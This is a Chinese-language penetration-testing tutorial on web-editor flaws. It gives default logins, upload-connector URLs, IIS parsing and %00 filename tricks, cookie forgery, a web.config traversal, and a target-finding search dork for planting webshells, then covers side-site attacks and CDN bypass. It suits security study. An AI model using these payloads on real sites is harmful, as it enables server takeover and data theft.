编辑器漏洞

一.本文介绍

1、本文介绍Ewebeditor常识、获取webshell、fckeditor获取webshell、旁注原理、ip逆向查询、目录越权及跨库查询、cdn绕过。

二.学习步骤

1、Ewebeditor常识：

默认后台：xxxx.com/ewebeditor/admin_login.asp

数据库地址：ewebeditor/db/ewebeditor.mdb

帐号：admin     密码：admin/admin888/admin000(各种弱口令)

常用数据库路径为:

ewebeditor/db/ewebeditor.asa

ewebeditor/db/ewebeditor.asp

ewebeditor/db/#ewebeditor.asa

ewebeditor/db/#ewebeditor.mdb

ewebeditor/db/ewebeditor.mdb

ewebeditor/db/!@#ewebeditor.asp

ewebeditor/db/ewebeditor1033.mdb 等

默认数据库下载报错。(.mdb被保护了，从这里找到.mdb删除就好了)

2、Ewebeditor后台获取webshell

1. http://IP/admin_login.asp：账号：admin 密码：admin，然后添加样式，

在图片类型中加入以下类型:asa|cer|asp|aaspsp

最后添加工具栏：插入或修改图片

2. 工具栏添加好后点击“预览”，上传在样式的图片格式中加入cer或asp等，我上传的是shell.cer，然后在代码的地方可以看到URL，然后菜刀连接即可。用低版本浏览器，高版本可能打不开.

2）目录遍历  

 点击"上传文件管理" 然后选择样式目录。

在id=14后面加上&dir=../，发现没有起作用，那就是2.1.6这个版本不存在这个漏洞。换成2.8.0。2.8.0存在这个文件遍历漏洞。

4. 在下载的数据库中看eWebEditor_style表中的S_ImageExt字段是否有被人添加过什么。

使用下面的语句进入突破:

ewebeditor.asp?ID=xx&style=yy  其中的id=xx就是被修改过的那条记录的id，而yy就是S_name字段的名字。

3、Ewebeditor文件上传实验

将代码新建为html：

创建完直接打开，点击上传按钮将马上传，右键查看源代码：

默认文件上传保存的路径为ewebiditor/uploadfile，访问：http://IP/uploadfile/2020417145621756.cer，输入马的密码：

4、fckeditor获取webshell

1.查看编辑器版本

FCKeditor/_whatsnew.html

2.FCKeditor编辑器页

FCKeditor/_samples/default.html

3.常用上传地址

FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp

FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp

FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/asp/connector.asp

2.5的版本下面这条语句能用：

http://192.168.87.129:8234//editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/asp/connector.asp

若出现：

根据提示，需要：

开启文件上传功能,把\editor\filemanager\connectors\asp\config.asp文件中的

DimConfigIsEnabled

ConfigIsEnabled = False

设置成功true。

手工新建：

/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/&NewFolderName=fendo.asp

原因：

CurrentFolder：当前文件夹 未进行过滤(这个文件夹下的没有过滤)

NewFolderName：新建文件名 进行了过滤

添加敏感文件夹

敏感目录

登录即可获取shell

CKFinder编辑器：

任意文件上传漏洞

其1.4.3 asp.net版本存在任意文件上传漏洞，攻击者可以利用该漏洞上传任意文件，CKFinder在上传文件的时候，强制将文件名(不包括后缀)中点号等其他字符转为下划线_,但是在修改文件名时却没有任何限制，从而导致可以上传1_php;1.jpg等畸形文件名，最终导致文件上传漏洞

然后修改文件名

1_php;1.jpg

利用iis6.0目录解析漏洞拿shell

创建目录/x.asp/

在目录下上传图片马即可拿shell

southidceditor ：南方数据编辑器

任意文件上传漏洞

首先登陆后台

利用编辑器上传

访问admin/southidceditor/admin_style.asp

修改编辑器样式，增加asa(不要asp).然后直接后台编辑新闻上传

UEDITOR编辑器：

利用ii6.0文件名解析漏洞

上传图片改名为：

x.php;20221.jpg获取shell

DotNetTextBox编辑器：

任意文件上传漏洞

关键字:system_dntb/

确定有system_dntb/uploadimg.aspx并能打开，这时候是不能上传的，由于他是验证cookie来得出上传后的路径，这样我们可以用cookie欺骗工具

cookie:UserType=0;IsEdition=0;Info=1;

uploadFolder=../system_dntb/Upload/;

路径可以修改，只要权限够，上传后改名为1.asp;.jpg利用iis解析漏洞

Kedit编辑器：PHPWEB网站管理系统后台

两种利用方式：

第一种是利用iis6.0文件名解析漏洞：

xx.php;xx.jpg

第二种方式：

%00截断

xx.php%00jpg

ute Editor在线编辑器：

本地包含漏洞

影响版本：

Cute Editor For Net 6.4

脆弱描述：

可以随意查看网站文件内容，危害较大

攻击利用：

http://www.xx.com/Cute_Client?CuteEditor/Load.ashx?type=image&file=../../../web.config

Cute Editor Asp.Net版：

利用iis解析漏洞获得权限

影响版本：

CuteEditor for ASP.NET中文版脆弱描述：

脆弱描述：

CuteEditor对上传文件名未重命名，导致其可利用IIS文件名解析Bug获得webshell权限。

攻击利用：

可通过在搜索引擎中键入关键字 inurl:Post.aspx?SmallClassID= 来找到测试目标。

在编辑器中点击“多媒体插入”，上传一个名为“xxx.asp;.avi”的网马，以此获得权限。

5、旁注原理

主站不存在漏洞，通过同服务器的其它站点存在的漏洞，进而获取整个服务器网站的权限，进行控制。

6、ip逆向查询

可通过ping 域名获取其相关IP地址，之后通过IP地址反查获取其旁注的域名。

相关网址：

http://tool.chinaz.com/Same/

http://dns.aizhan.com/

http://www.11best.com/ip/

目录越权：

通过一个网站的目录访问统一服务器下的其他网站的目录，一个网站被攻陷，全都被攻陷

防御方法：每个网站创建一个不同的账号

1、建立一个账号test，默认在 users 组

2、将网站的身份验证和访问控制的匿名访问更换为test

3、将IUSR删除，添加test用户，需要注意的是，尽量不要同时给读取运行和写入权限，读写分离。

4、如果要绝对的安全，可以将C盘的访问权限设置为仅管理员访问

跨库查询：是指由于权限设置不严格，导致普通帐号被授予过高的权限，从而使得其可以对其他的数据库进行操作。比如，在mysql中，informatin_schema

这个表默认只有root有权限进行操作。但是如果一个普通账户权限过高后，他便可以对该数据库进行操作，从而影响整个mysql数据库的运行。

sqlmap里面使用“—current-代表”进行判断当前库是哪个。Mysql的root、mssql的sa、oracle的sys 分别是其数据库中权限最大的账户。

8、cdn绕过

1.利用SecurityTrails平台

2. 二级域名或泛解析ping

3.nslookup

4.https://dnsdb.io/zh-cn/ ###DNS查询

https://x.threatbook.cn/ ###微步在线http://toolbar.netcraft.com/site_report?url= ###在线域名信息查询http://viewdns.info/ ###DNS、IP等查询

https://tools.ipip.net/cdn.php ###CDN查询IP